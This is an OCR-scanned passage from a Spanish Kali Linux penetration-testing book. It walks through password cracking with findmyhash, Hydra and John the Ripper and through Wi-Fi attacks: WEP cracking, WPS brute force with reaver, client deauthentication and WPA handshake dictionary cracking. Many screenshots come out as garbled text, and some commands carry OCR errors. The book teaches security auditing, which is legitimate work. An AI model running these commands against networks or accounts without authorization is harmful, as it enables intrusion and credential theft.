Respecto a estos dos últimos, probablemente nos interese utilizar otra 
utilidad, denominada mimikatz, si vamos a trabajar en entornos Windows. Más 
adelante vamos a hablar de ella. 


La forma de utilizarlo es: 


findmyhash algoritmo -h valordehash 


Donde algoritmo corresponde con uno de los algoritmos anteriormente 
listados, y valordehash sería el valor del hash que queremos craquear. Si añadimos 
la opción -g, también busca el hash en google; lo que, aunque parezca increíble, a 
veces funciona. 


Un ejemplo de uso de findmyhash es: 


findmyhash MD5 -h 916f4c31aaa35d6b867dae9a7f54270d -g 


Está a punto de salir la versión 2 de esta aplicación, que incluye análisis 
multihebra, opciones de pausa y continuar después de pausa, y reconocer el algoritmo 
a partir del valor del hash. 


9.2 HYDRA 


Dentro de las herramientas de fuerza bruta, una de las mds utiles y prácticas 
es Hydra. Principalmente, porque soporta más de medio centenar de protocolos; 
además de los genéricos, gran cantidad de protocolos muy específicos. Los protocolos 
contra los que Hydra puede actuar son: 
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postgres 
n 


cisco | cisco-enable 
cp 














Si 
smtp-auth-ntlm 
pu. p Jp  -] 7j 







Esta no es la ünica razón; cuenta con un interfaz gráfico extremadamente 
sencillo de usar. Nos limitamos a indicar qué queremos atacar, el fichero diccionario 
de usuarios, el fichero diccionario de claves, y arrancamos el ataque. 


Lanzamos el interfaz gráfico xHydra con: 
xhydra 
Aparece la primera pantalla: 


xHydra 
Salir 
Target Passwords Tuning Specific Start 
Target 


@ Single Target [127.0.0.1 





© Target List | 





C] Prefer IPV6 


Port 0 s 


Protocol 


Output Options 


_] Use SSL (2 Use old SSL Г] Be Verbose 


C] Show Attempts - Г] Debug 


C) COMPLETE HELP C) Service Module Usage Details 
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En la que indicamos o la máquina que queremos analizar, o un listado de 
objetivos. Indicamos si queremos hacerlo por IPv4 -opción por defecto-, o por 
IPv6 marcando el cuadro. Indicamos también el puerto y el protocolo que queremos 
analizar, y una serie de opciones adicionales: 

WF Use SSL: Lo marcamos si queremos hacer las pruebas a través de SSL. 

Y Show attemps: Muestra los intentos en la lengueta de inicio. 

V Be verbose: Muestra mucha más información en la lengüeta de inicio. 

Y Debug: Muestra información de depuración en la lengüeta de inicio. 

Y Después entramos en la lengüeta “passwords”, obteniendo: 

xHydra 


Salir 


Target | Passwords | Tuning Specific Start 
Username 


@ Username [yourname | 
Y 





O Username List | | 


C Loop around users —.] Protocol does not require usernames 


Password 





@ Password yourpass 





© Password List 


› Generate 


Colon separated file 





[1 Use Colon separated file 


k 


[] Try login as password | | Try empty password |.) Try reversed login 





Aquí indicamos el usuario, o un fichero con un listado de usuarios; la clave, 
o un fichero con un listado de claves, el criterio de generación de claves a partir del 
diccionario, y las opciones adicionales: 


Y Colon separated file: Aquí podemos indicar un fichero en el que estarán 
usuarios y claves, separados por comas, para trabajar con ese fichero en 
lugar de con las opciones anteriores. 


V ‘Try login as password: Anade el nombre de login al diccionario de claves 
para probar combinaciones que también involucren el nombre del login. 


V ‘Try empty password: Prueba también con la clave vacía, a ver si algún 
usuario no ha definido clave. 
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Si pasamos a la lengüeta "Tuning", veremos la pantalla: 


xHydra 
Salir 


Target Passwords Tuning Specific Start 
Performance Options 


Number of Tasks 
Timeout 


( Exit after first found pair (per host) 
[C Exit after first found pair (global) 


! Do not print messages about connection errors 
Use a HTTP/HTTPS Proxy 
© No Proxy HTTP Method CONNECT Method 





Proxy 'http://127.0.0.1:8080 


С) Proxy needs authentication 
k 


Username yourname 








Password yourpass 


hydra -1 yourname -p yourpass -t 16 127.0.0.1 





Esto permite definir una serie de propiedades que mejorarán el rendimiento de 
xHydra. Es importante que recordemos que estos son siempre máximos: la naturaleza 
de algunos servicios puede obligar a reducir el número de hebras concurrentes. 


Las opciones que encontramos son: 


F Number of Tasks: Número de hebras concurrentes. El valor por defecto 
es 36 hebras. 


Y Timeout: Valor de timeout para la respuesta de un objetivo. El valor por 
defecto es 30 segundos. 


У Exit after first found pair: xHydra da el análisis por terminado cuando 
encuentra el primer par login/password que funciona. 
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Además, es en esta lengüeta dónde podemos decidir si usamos un proxy; las 
opciones son: 


VF No proxy / HTTP Method / CONNECT Method: si no tenemos proxy, о 
si nos conectamos por HTTP o por CONNECT. 


V Proxy: Dirección del proxy, en formato http://IP:puerto 

V Proxy needs authentication: Si el proxy necesita autenticación. 

Y Username: Usuario en el proxy. 

Y Password: Clave en el proxy. 

En la lengüeta Specific tenemos algunos parámetros específicos de algunos 
protocolos: 


xHydra 


Salir 


Target Passwords Tuning Specific Start 
http-proxy url / http-proxy-urlenum credential module 


http / https url 
|/foo/bar/protected.html 





Cisco Enable, Login for Cisco device 

| password 

LDAP DN 

SMB 

C local accounts С) domain accounts Г Interpret passes as NTLM hashes 
sapr3 client id 

1 

CVS/SVN Repository 

trunk 











Telnet - Successful Login String 
a аааваанонане одада: ИИ 


SNMP 
[3:SHA:AES:READ 


dra -l yourname -p ass -t 16 127.0.0.1 
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Y finalmente en “Start” tenemos las opciones de arranque, parada, grabar la 
salida y limpiar la ventana de salida -por ese orden-. 


xHydra 
Salir 


Target Passwords Tuning Specific Start 
Output 


Clear Output 





No podemos terminar tratar el tema de aplicaciones de Kali para ataques a 
contrasenas sin mencionar a John the Ripper. Muy veterano, muy utilizado y айп 
muy ütil y muy actual. 


john the Ripper es el programa de ataque de claves sin conexión por 
excelencia. Su versión Jumbo es capaz hasta de hacer uso de CUDA o de OpenCL 
para poder atacar claves con mayor eficiencia. Soporta multitud de hashes: MDS, 
SHA1, LM y NTLM, entre otros; es decir, los más comunes. Necesitaremos, eso 
si, el fichero con los hashes; ya que John the Ripper como hemos dicho actúa sin 
conexión: no se conecta a un servidor directamente, sino solo prueba claves, las 
codifica como hashes, y verifica si coincide con el hash almacenado. 
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John the Ripper se puede manejar a través de un interfaz gráfico, que abrimos 
COD: 


johnny 


Obteniendo la ventana: 


Johnny 
File Attack Passwords Help 


J 5 A Y X 5 mi 


Open password file Open session Start new attack Resume attack Pause attack Guess password | Copy Export 


Filte Starts а new attack session using the defined options pcked Show only cracked 


Passwords 





nl 
— 
Options 
„їй 
Statistics 
Settings 
1 
2 | 


Console log 





Pulsando en el icono "Options" de la barra de la izquierda, podemos 
seleccionar el modo de ataque. El modo por defecto hace primero el modo "Single 
Crack", después el “Wordlist” y finalmente el “Incremental”. Desde estas lengüetas 
podemos alterar el comportamiento de estos modos, y especificar modos adicionales. 

Si entramos en "Single Crack" vemos las opciones de este modo: 
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File Attack Passwords Нер 


+ MN ee R X Е Ы 2. 


Open password Ме Ореп session Start new attack Resume attack Pause attack Guess password | Copy Export 


Q session details 
Passwords Session name: 
Input password files: 


Current hash format: [Auto detect ~ 
Tip: Modified attack options come into effect only when starting a new attack 


Default Single crack Wordlist Incremental Extemal Mask Markov Prince 





With default behaviour John the Ripper will run single crack mode, then wordlist mode, then incremental mode. All attacks 
will execute with default John options. For optimized attacks and better chance of yield choose a specific mode from above. 


k 








File Attack Passwords Help 


А 
Ж Ls X X | Е 


Open password file Open session Start new attack Resume attack Pause attack Guess password 


ә Session details 
Passwords Session name: 
Input password files: 
Current hash format: Auto detect v 


Tip: Modified attack options come into effect only when starting a new attack 


Statistics Attack mode 
Default Single crack Wordlist Incremental Extemal Mask Markov Prince 


Single crack mode is the fastest mode. It uses user names, GECOS and other information with word mangling rules named 
"Single". 





LJ Use external mode, filter name: I 
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Permite que caigan las claves más fáciles de forma casi instantánea: 


Johnny 
File Attack Passwords Help 


ооо 
K Ў, 
, v ' v A 


€ Hl? 
„Ё 
Open password file Open session 


Start new attack Resume attack Pause attack Guess password Copy Export 
Nam Filter | Select columns У J Show only checked 
Passwords User v Password 


1 Show only cracked 
Hash Formats 
$6$cAUmrnJ$vC292... sha512crypt,crypt 
$6$rruAxwlS$Oanv... 


GECOS 
16910-0.99999:7:;: 


sha512crypt,crypt 16910:0:99999:7::: 
.S6$ENIDbGN$Gbc. зһә512х‹турыстур! — 1983100999997. _ 


|рере4 








El modo Wordlist es realmente un modo diccionario, pudiendo seleccionar 
diccionarios externos, y reglas sobre los diccionarios: 


File Attack Passwords Help 


>= 2 
UM LE n n 
Open password file Open session 


Ss Ы 


Startnew attack Resume attack Pause attack Guess password | Copy Export 


ә Session details 
Passwords Session name: 


= Input password files: 
Current hash format: Auto detect ~ 
pm ESA 


Tip: Modified attack options come into effect only when starting a new attack 
„0 
Statistics Attack mode 


Default Single crack Wordlist Incremental External Mask Markov Prince 
Settings Wordlist mode uses data from a wordlist file. In addition to that rules can be applied. Section "Wordlist" would be used to 
pl mangle words with rules, 
Wordlist file: 


1 


Browse | |j Loopback 


| Use extemal mode, filter name: 


LJ Use rules: 


LJ Use Hybrid Mask mode with mask : 
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El modo Incremental corresponde con la fuerza bruta, pudiendo aplicar 
máscaras, filtros y qué juegos de caracteres vamos a utilizar: 


e 
us MES x R z la 
Open password fle — Open session Start new stack Resume attack Pause ettek Guess password | Copy Export 


ә Session details 
Passwords Session name: 


Input password files: 
Current hash format: Auto detect ~ 


Тїр: Modified attack options come nto effect only when starting anew attack 
oul 
Statictice Attack mode 





Settings 





Incremental mode is the most exhaustive attack because it will try all possible combinations under the specified rules. Order of 
tries is based on frequencies of single characters, pairs and trigraphs, This attack can potentially run for a long time, «o it should 
El be used after all other modes have been exhausted. Information about frequencies is taken from file called charset Such files 


are listed with names in configurason file. To specify a different charpet from the default toggle the afferent checkbox on and 
specify name of desired charset. 

LJ Charset name: 

LJ Use external mode, filter name: 


LJ Use Hybrid Mask mode with mask: 





Podemos incluir nuestros propios generadores, programados por nosotros: 


File Attack  Paeeworde Help 


2 bp 
(3 z d ssl b. n Е ta 
Open password file :Ореп session | Sturt пем отаси Resume attack Pause attack Guess password | Copy Export 
@ session details 
Passwords Session name: 

Input password files: 


Current hash format Auto detect > 


Tip: Modified attack options come into effect only when starting a new attack 
Attack mode 


Default Single crack Wordist Incremertal External Mask Markov Prince 


External mode is the most flexible one because you can define your own code to generate candidates. Also you can create 


filters to reduce amount of candidates to try (said filters are available for uce with other modes). There are predefined external 
routines in John's configuration file. 


Mode name: I 


Г) Use Hybrid Mack mode with mack 
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Tenemos un modo de máscara, ütil cuando hemos "pescado" unos caracteres 
al ver teclear la clave, pero no los tenemos todos: 


8. 5, Е 
Open password file Open session 
Session details 
Sescion name: 


input password files: 
Current hash format Auto detect ~ 


The hash format to attack Options come Into effect only when starting a new attack 


Default Single crack Wordlist Incremental External Mask Markov Prince 


Mask mode is a fast way to produce password candidates given a "mask" that describes what the words should look like. For 


example, the mask 74701 will generate all possible three-letter words, with first character uppercased and the remaining in 


lowercase. To see the right syntax to bulld your mask, refer to the file called MASK in JtR Jumbo doc 1 
Mask 





2 Use external mode, filter name: 


O Use rules: 





Tenemos un modo predictivo, basado en cadenas de Markov, que funciona 
muy bien para claves “aparentemente” aleatorias pero tecleadas por un humano: 


File Attack Passwords Help 


e, ~ " „ 
Open password fle Open session 
Q session details 
Passwords Session name: 
Input password files: 
Current hash format: Auto detect ~ 


Tip: Modified attack options come into effect only when starting a new attack 


Default Single crack Wordlist Incremental External Mask Markov Prince 


This is a stand alone mode, where word-lke strings are created based upon a complex 


algorithm based upon ‘weights’ or 
Ubeliness of characters following characters. A full description of this mode and its usage is found in the JtR jumbo doe folder 
MARKOV document. 


Mode (leave empty for default mode): r 


L Use external mode, filter name: 
Use Hybrid Mask mode with mask: 
© Minimum Markov level: 

— Maximum Markov levet 

— Start index: 


— End index: 
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Y finalmente, predicción de claves por PRINCE: 


File Attack Passwords Help 


Be Lis А x т fd 
Open password fe Open session 


Start new attack Resume attack Pause attack Guess password Copy Export 
ә Session details 
Passwords Session name: 
Input password files: 


Current hash format: Auto detect v 


Tip: Modified attack options come into effect only when starting a new attack 


Default Single crack Wordlist Incremental External Mask Markov Prince 





Prince mode is a modern password quessing algorithm. Rather than taking as input two different dictionaries and then outputting 


all the possible two word combinations though, PRINCE only has one input dictionary and builds "chains" of combined words. 
These chains can have 1 to N words from the input dictionary concatenated together, 


Wordlist file: k Browse | |) Loopback 
. Use external mode, filter name: 


— Use rules: 
— Use Hybrid Mask mode with mask- 
С) Minimum number of elements per chain: 


— Maximum number of elements per chain; 


—— Initial skip: 








Utilizar Johnny es tan simple como entrar en “File”, seleccionar el fichero 
con los hashes, y pulsar "Start new attack": 


Johnny 


ооо 
File Attack Passwords Help 


<» 3 
х ) m Р Г v X K Е са È m 
Open password file Open session | Start new attack Resume attack Pause attack Guess password Copy Export 


Filter Select columns Y 1) Show only checked |. Show only cracked 
swords User X Password 


Hash Formats GECOS 
$6$cAUmrj$vC292.. sha512erypt,erypt 16910:0:99999:7::: 
$6$muAxwiSS0an/.. sha512crypt,crypt 
$5$EaKIDbGN$Gbc.. 5ha512crypt,crypt 





16910:0:93999:7::: 
16910:0:99999:7::; 














AUDITORÍAS A REDES WIFI 


Las redes Wifi es uno de los aspectos cuya auditoría es más importante. 
Principalmente, porque no es extrano encontrar redes desconocidas por los propios 
administradores de sistemas; pueden caer sin muchos problemas, y además cuando 
caen dan acceso a la red interna de la empresa, y con frecuencia sin pasar por ningün 
firewall. 


Es una buena práctica a la hora de disefiar la red wifi, plantearla como si 
estuvieran sus nodos en la DMZ; y poner un firewall de interposición entre las 
máquinas que se conectan por Wifi y las máquinas internas de la empresa. Sin 
embargo, esto se hace muy pocas veces; por lo que el escenario habitual será de 
vulnerabilidad máxima de toda la red en caso de que la Wifi sea vulnerable. 


Las redes Wifi, por otro lado, pueden llegar a ser realmente vulnerables. 
Hay muchas cosas que se pueden hacer con una Wifi y que no cubriremos en este 
libro: envenenamiento, o suplantar a un AP, son dos de los ataques más frecuentes 
y que no cubriremos. No vamos a entrar en eso por las restricciones de tiempo. Nos 
centraremos en lo primero que debemos probar, y que nos dará un mayor retorno en 
tiempo en caso de funcionar: obtener la clave de la Wifi. 


Vamos a dejar fuera del libro también por razones de tiempo la auditoría de 
otras tecnologías sin hilos, tales como RFID, NFC y Bluetooth. Kali trae herramientas 
para busqueda, análisis y envenenamiento de estos dispositivos, así como escaneo de 
vulnerabilidades conocidas, pero no entraremos en ello. 


138 KALI LINUX © RA-MA 


6.1 WIFIAUDITOR 


Es relativamente frecuente, especialmente en domicilios particulares, que no 
se toque la configuración por defecto del router, ni se cambie la clave. 


Un primer análisis que podemos hacer es buscar estos routers wifi, con las 
claves "de fábrica". Es importante destacar que este método no suele funcionar. 
Pero cuando funciona, la relación entre costo y resultado es tan beneficiosa, que es 
una muy buena idea hacerlo. 


Dado que las WPA caen, pero tardan en caer aün con las claves por defecto 
que acompafian a los routers Wifi de fábrica, es una muy buena idea intentar este 
paso, aunque de entrada planeemos un ataque a las WPA. 


Existen multitud de programas para teléfonos móviles que hacen estas 
pruebas, pero nos centraremos en uno para ordenadores, que es el WifiAuditor. No 
forma parte de Kali, pero es fácil de instalar y de ejecutar. 


La página de WifiAuditor es: 
http://www.wifiauditor.net/ 


WifiAuditor está en Java, por lo que podremos ejecutarlo sin problemas nada 
más descargarlo si tenemos una máquina virtual Java. Lo podemos descargar desde: 


http://wifiauditor.net/WIFlAuditor.jar 
Y lo lanzamos con: 
java -jar WIFlAuditor.jar 


Obteniendo un listado de redes: 


i$ ш WIFI Auditor 
Archivo Redes Manual Ayuda 


Redes disponibles: 15 





Nombre Contraseña 
афр 

MOVISTAR 
MOVISTAR, 


HP-Print-E2-Pho... 
MOVISTAR 








ЈЕ 



































| ONOWIFI 


Red Wi-Fi de MD. 


Jazztel 
== 


шанаа 





























П 





C] Conectar automaticamente Auditar redes Conectar 
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Seleccionamos una de las redes, y puede ocurrir que obtengamos la clave: 


Archivo Redes Manual Ayuda 


Redes disponibles: 1 


Nombre | Contraseña Conectar 
JAZZTEL LJ 























| C Conectar automaticamente Auditar redes [ Conectar 


8 ш WIFI Auditor 
Archivo Redes Manual Ayuda 


Redes disponibles: 0 





Nombre | Contrasefia Conectar| 





"TO WIFI Auditor <2> x) © 


(1) No hay ninguna red vulnerable disponible 


C] Conectar automaticamente Auditar redes Conectar 











Es importante que recordemos que WifiAuditor está especializado en routers 
ADSL o de cable con Wifi. No hace fuerza bruta, ni tiene una tabla rainbow. Ni siquiera 
técnicamente podemos deducir que se trate de ataque por diccionario de claves; ya que 
se limita a listar las redes que ha encontrado, a partir del nombre de la red deducir el 
proveedor, y a partir del proveedor, el nombre de la red y la MAC del router generar 
la clave por defecto que ha utilizado el proveedor de Internet en ese router concreto. 
Da lo mismo que utilicemos WPA, y da lo mismo que la clave del proveedor sea muy 
complicada. Si no se cambia la clave, va a caer con total seguridad. 


Tal y como hemos comentado, en este análisis puede caer la red de una 
microPYME. Las empresas medianas, o las pequeñas que no tienen personal 
especializado, también pueden caer. Pero curiosamente las grandes también caen, 
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pero por razones distintas: sí tienen personal especializado que sabe la importancia 
de cambiar las claves. Pero puede haber a algün listo que no le llegue la Wifi a su 
despacho con la intensidad que quiere para usar su tableta, y enganche un router ADSL 
viejo y lo ponga en cascada vía Ethernet con la red principal. Lo que es tan sencillo 
como enchufarlo y no necesita configuración adicional habitualmente. Si la tableta ha 
obtenido los parámetros de red del servidor DHCP corporativo, para el router ADSL 
viejo no dejará de ser una LAN en la que se limita a mandar los paquetes dónde le dicen 
las tablas ARP. Este es solo un ejemplo de los que se pueden dar. También se puede dar 
esto en sucursales y en franquiciados de empresas que tengan un sistema de sucursales 
o franquicias, y que darían acceso vía red al sistema de información. 


6.2 CIFRADO WEP 


El cifrado WEP es el sistema de cifrado que se ha utilizado tradicionalmente 
para hacer seguras las redes Wifi. Lo de hacer segura una red wifi con WEP hoy 
en día tiene su punto irónico. Sin embargo, debemos tener en cuenta que existen 
administradores de sistemas que no conocen la diferencia entre WEP y WPA. 
También hay routers y AP que se instalaron hace mucho tiempo, y que o se despidió al 
administrador de sistemas y nadie recuerda que está, o se instaló de forma temporal, 
y nadie se acuerda que hay un AP obsoleto en algün sitio айп transmitiendo, o incluso 
alguien se ha montado su AP propio bajo su cuenta y riesgo, o se lo ha montado a 
un directivo peleón que no quiere plegarse a la política de seguridad de la empresa. 


El cifrado WEPya ha sido comprometido, por lo que no es seguro. Se ataca por 
simple observación —es decir, extrayendo los suficientes paquetes, el protocolo cae—; y 
utilizaremos las herramientas air, que también se utilizan contra las redes WPA. 


El primer paso para tumbar un protocolo Wifi es ver qué tarjetas Wifi 
disponemos: 


iwconfig 


Lo que da una salida como: 
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Nos quedamos de esta pantalla con el nombre de la tarjeta -wlp4s0 en 
nuestro caso-. Ahora lanzamos el monitor, lo que hacemos con: 


airmon-ng start dispositivo 


Donde dispositivo es el dispositivo que vimos en el paso anterior. Hacemos 
en nuestro ejemplo: 


airmon-ng start wlp4s0 


Obteniendo: 











Observamos el nombre del monitor que ha creado; en nuestro ejemplo, 
mon. 


Ojo: a veces nos protestará porque tenemos varios dispositivos que usan el 
interfaz que queremos analizar. Los "culpables" en Kali suelen ser habitualmente 
los daemon NetworkManager, wpa supplicant y avahi-daemon. Los deberemos 
matar con kill para que no den problemas. airmon-ng ya nos indica los PIDs de estos 
procesos problemáticos. 


A veces es necesario cambiar la MAC del monitor; en ese caso, primero 
damos de baja el interfaz asociado al monitor: 
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ifconfig mon0 down 
Y después utilizamos el comando: 
macchanger -m nuevaMAC interfaz 


Donde nuevaMAC será la MAC nueva, y interfaz al interfaz al que se la 
queremos asignar. Por ejemplo, podemos cambiar la MAC de топо del valor que 
tiene al valor 00:11:22:33:44:55: 


macchanger -m 00:11:22:33:44:55 mon0 


Obteniendo: 


= 
Archivo Editar Ver Marcadores Preferencias Ayuda 





Y volvemos a subir el interfaz: 


ifconfig топо up 


Obteniendo: 


Archivo Editar Ver Marcadores Preferencias Ayuda 
oe - 
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Cuando ya lo tengamos todo listo, es el momento de comenzar con el 
volcado. Primero hacemos un escaneo para ver las redes disponibles: 


airodump-ng interfaz 


En nuestro ejemplo, sería: 


airodump-ng monO 


Al cabo de un tiempo, obtendremos algo como: 


Editar Ver Marcadores Preferencias Ayuda 








Aquí nos van a interesar los BSSID -primera columna, que está borrada en la 
captura por razones obvias- y el canal -sexta columna-. Esperamos un rato, y cuando 
ha aparecido la red WEP que queremos "cazar", ya podemos parar con Ctrl+C. 


El siguiente paso será comenzar la captura de paquetes: 

airodump-ng -c canal -w fichero --bssid dirección interfaz 

Donde canal corresponde con el numero de canal —sexta columna-; fichero, 
con el fichero donde grabaremos los datos capturados. El valor dirección corresponde 


con la dirección BSSID -primera columna- e interfaz, el interfaz desde el que 
estamos monitorizando. En nuestro ejemplo, habríamos hecho: 
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airodump-ng -c 3 -w fichJaz.cap --bssid teloheborrado:77 
monO 


airodump-g 
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Sin cerrar el terminal anterior abrimos uno nuevo; y en el nuevo terminal 
vamos a asociar nuestra tarjeta de red al BSSID. Esto lo hacemos con: 


aireplay-ng -1 6000 -a BSSIDmac -h miMAC interfaz 


Donde BSSIDmac es la MAC del BSSID, miMAC es la MAC del interfaz 
monitor, y interfaz es el nombre del interfaz monitor; lo que en nuestro ejemplo sería: 


aireplay-ng -1 6000 -a teloheborrado:77 -h 00:11:22:33:44:55 mon0 


-h 00:11:22:33 


on channel 1 





Salvo en redes con muchísima carga de gente entrando en la red 
constantemente, lo que no será el caso, así nos tiraremos un par de vidas. Sin 
embargo, podemos acelerar el proceso haciendo: 


aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b BSSIDmac -h miMAC interfaz 


Donde BSSIDmac es la MAC del BSSID, miMAC es la MAC del interfaz 
monitor, y interfaz es el nombre del interfaz monitor; por lo tanto, en nuestro ejemplo 
sería: 


aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b teloheborrado:77 -h 00:11:22:33:44:55 
mono 


Aqui es donde realmente estamos atacando la red. Nos va a terminar 
preguntado si queremos usar un paquete que ha encontrado. Estos son los paquetes 
que realmente vamos a aprovechar. Pulsamos y, y luego la tecla enter: 


L-e ЁР:РЕ:РЕ:РЕ:РЕ:РЕ -p 


а ш шй». 


000 ffff ffff 
13d5 8 30 
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= 





Una vez que hemos capturado al menos un paquete util, es el momento de 
mirar si ya tenemos suficiente para encontrar la clave. Para hacer esto sin cerrar las 
dos terminales anteriores -que estarán trabajando de forma continua-, abrimos una 
tercera terminal; e introducimos el comando: 


aircrack-ng -z nombredelared..cap 


Donde nombredelared es el nombre de la red que estamos atacando; así 
aprovechará todos los archivos generados, que tienen un nombre que comienza por el 
nombre de la red que estamos atacando, y el nombre termina en .cap -aireplay-ng usa 
ese criterio para volcar los paquetes útiles—. Si tenemos suficientes IVs, la clave cae: 





Si no hay suficientes IVs es tan simple como esperar a que airodump-ng en 
la primera terminal obtenga más IVs y lo volvemos a intentar pasado un tiempo. Pero 
Caer, сае. 


6.3 WPA/WPA2 


WPA y WPA2 son los protocolos que de entrada deberían usar todas las 
Wifi para tener un mínimo de seguridad. Esto no significa que no caigan; sino que a 
diferencia de WEP, WPA y WPA2 no caen de forma instantánea. 


Dentro de los tipos de autentificación que soportan WPA у WPA2, la 
única que cae de forma automática —que no instantánea— es la autentificación por 
claves compartidas -pre-shared keys, o PSK-. Si la red emplea otro mecanismo de 
autentificación, no va a caer con tanta facilidad atacando el cifrado de la red. 


Ojo: por muy segura que sea la red, y aunque empleemos sistemas de 
autentificación distintos del PSK, una red Wifi siempre puede caer por WPS. Si 
alguno de los AP de la red tiene WPS activo, lo normal es intentar un ataque a WPS; 
o bien teniendo acceso físico al AP si soporta la transferencia de claves por USB. Si 
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el AP intercambia credenciales vía PIN, cae por fuerza bruta con las utilidades ya 
comentadas en temas anteriores. Intercambio por PBC también es factible si tenemos 
acceso físico al AP y podemos pulsar el botón. 


Hay una utilidad específica para WPS, que se denomina reaver, y que tiene 
la sintaxis de uso: 


reaver -b ESSID -i interfaz -vv 


Donde inferfaz es el interfaz Wifi, y ESSID es el ESSID del AP. Podemos 
anadir -K 1 si queremos que haga un ataque Pixie Dust. El ataque Pixie Dust acelera 
muchísimo el ataque contra Ralink, Realtek, y Broadcom. El ataque Pixie Dust 
también lo podemos hacer con la utilidad pixewps que también acompaña a Kali 
-pero, a diferencia de reaver, pixiewps solo hace Pixie Dust-. 


Si hay WPA o WPA2 y ningún AP soporta WPS, como hemos comentado, 
analizamos el tipo de cifrado. Como hemos dicho, en ese escenario de WPA o WPA2 
y no WPS solo es posible atacar la autentificación PSK. Sin embargo, hay otra 
mala noticia -especialmente si ya hemos probado con qué facilidad cae WEP-. En 
WEP hemos podido inyectar paquetes para acelerar el proceso, recogiendo IVs y 
utilizando las limitaciones de WEP para extraer la clave con facilidad de los IVs. 
WPA y WPA2 no comparten con WEP estos defectos de diseño, por lo que la única 
forma de atacarlo es por fuerza bruta, diccionario de claves o tablas rainbow. 


Como en el caso de WEP, comenzamos parando el interfaz: 
airmon-ng stop ath0 


Con el resultado de: 


Archivo Editar Ver Marcadores Preferencias Ayuda 
П # аїгтоп-па sto ] 
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Ahora vemos cual es realmente el nombre del interfaz Wifi en el que vamos 
a conectar el monitor: 


iwconfig 


Obteniendo algo como: 


ЕЗ bash - Konsole 
Archivo Editar Ver Marcadores Preferencias Ayuda 


]# eirmon-ng stc 


l SSID: 
aged Frequency 
ан ME 





bash x 





El siguiente comando será arrancar el monitor: 
airmon-ng start interfaz 9 
Lo que en nuestro caso será: 


airmon-ng start wlp4s0 9 





Comprobamos que hemos entrado en modo monitor, lo que hacemos con: 


iwconfig 


Debemos obtener algo como: 
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[-] 
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1% airmon-ng ste 


hipset 


2.452 GHz 
Fragment thr:off 


ssociated оме 
Fragment thr:off 





De aquí extraemos el nombre del monitor; en nuestro caso será mon0. 


Ahora comenzamos el volcado, lo que haremos con: 
airodump-ng interfazmonitor 


Lo que en nuestro caso será: 


airodump-ng monO 


Obteniendo: 


з 
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airodump-ng 
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Llegados a este punto debemos esperar un tiempo prudencial. Para una 
auditoría de seguridad con test de penetración, nos interesa mirar la columna ENC. 
Aquí nos interesan solo las redes WEP; así como las redes WPA o WPA2 que 
tienen autentificación vía PSK. Las demás no podemos penetrarlas. Las de WEP 
las hacemos con el método que ya hemos comentado. Las WPA o WPA2, las PSK. 
Escogemos las que queramos auditar. Damos preferencia, como hemos comentado, 
a las redes que por el nombre podamos deducir que han sido anadidas por usuarios 
y estén fuera del control de administradores del sistema, redes obsoletas, o redes de 
desarrollo, y que tenga clientes conectados. Una WPA o una WPA2 con una buena 
clave que se cambie con cierta frecuencia podemos considerarla infranqueable a 
efectos prácticos -salvo ingeniería social-. El que tenga cliente conectados lo vemos 
en la columna STATION. Sin clientes conectados, tendremos poco que hacer salvo 
fuerza bruta completa. 


Lanzamos el programa de volcado: 


airodump-ng -c 1 --bssid macBSSID -w file interfazmonitor 


Donde macBSSID es la MAC del BSSID, e interfazmonitor el interfaz que 
hemos deducido a través de iwconfig. En nuestro ejemplo concreto haremos: 


airodump-ng -c 1 --bssid F8:quetelovoyadeciryo -w file mon0 


Obteniendo algo como: 





Lo dejamos un rato, y vemos cómo tenemos clientes conectados. 


Ahora debemos escoger uno de estos clientes, y "echarlo" de la red. 
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Primero vemos lo que está pasando en la red: 


airodump-ng monO 


Escogemos de entre los que tienen BSSID el que queremos comprobar, una 
de las entradas en la columna STATION, que corresponde con los clientes: 


Ез 
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airodump-ng | airodump -n3 








Y ahora toca "echar" de la red a un cliente con: 
aireplay-ng -0 1 -a macBSSID -c macCliente interfazmonitor 


Donde macBSSID es la MAC del BSSID, macCliente es la MAC del cliente 
que vamos a echar, y que escogemos de la columna STATION, e interfazmonitor 
el interfaz que hemos deducido a través de iwconfig. En nuestro ejemplo concreto 
haremos: 


aireplay-ng -0 1 -a F8:quetelovoyadecir -c 38:elotro mon0 


Teniendo como efecto que ya no está autentificado, y que necesitaría 
autentificarse de nuevo para poder: 
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airodump-ng 





Y ahora viene el ataque de aircrack-ng, que utiliza un sistema de diccionarios. 
En principio, Kali trae un diccionario bastante bueno -el rockyou-; que podemos 
obtener desde la propia Kali haciendo: 


gunzip /usr/share/worldlists/rockyou.txt.gz 


Accediendo mediante la ruta /usr/share/worldlists/rockyou.txt al susodicho 
diccionario. 


También podemos extraer también un diccionario bastante bueno de la 
página web de Aircrack: 


https://github.com/aircrack-ng/aircrack-ng/blob/master/test/password.|st 
También podemos utilizar el diccionario de 13 GB de Wi-foo-er: 
http://pastebin.com/kk0Qfw67 


Este diccionario, como muchos otros, tiene muchas palabras duplicadas; 
por lo que es sensato para acelerar el proceso eliminar las duplicadas. Lo que tarda 
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bastante, pero luego acelera mucho más el proceso de encontrar la clave. Eliminamos 
los duplicados de cualquier diccionario con: 


sort diccionario | uniq -u > diccionarioU 


Donde diccionario es el diccionario del que queremos eliminar los duplicados, 
y diccionarioU el diccionario con los duplicados eliminados. 


Una vez que tenemos ya listo el diccionario, el comando para encontrar la 
clave lo lanzamos desde otra consola de texto, y es: 


aircrack-ng -w diccionario -b macBSSID file,.cap 


Donde diccionario es el diccionario de claves que vamos a emplear; y 
macBSSID es la MAC del BSSID. En nuestro caso concreto, 


aircrack-ng -w password.Ist -b F8:8E:85:FF:36:B2 file,.cap 


Como resultado de este proceso, que tarda -especialmente con diccionarios 
grandes-, podemos no tener ningún handshake en nuestra búsqueda: 


a 
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O podemos tener éxito: 


з 
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airodump-ng 





Podemos por curiosidad observar la salida del comando: 


airodump-ng -c 1 --bssid macBSSID -w file interfaz 


Donde macBSSID es la MAC del BSSID, e interfazmonitor el interfaz que 
hemos deducido a través de iwconfig —que estaba corriendo en segundo plano- ha 
encontrado el handshake. 


En nuestro ejemplo concreto, observaremos con: 


airodump-ng -c 1 --bssid F8:quetelovoyadeciryo -w file mon0 


Ha detectado el handshake: 


© КА-МА Capítulo 6. AUDITORÍAS А REDES WIFI 155 


a 
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airodump-ng 








AUDITORÍAS A APLICACIONES WEB 


Las auditorías a aplicaciones web podemos enfocarlas desde dos enfoques 
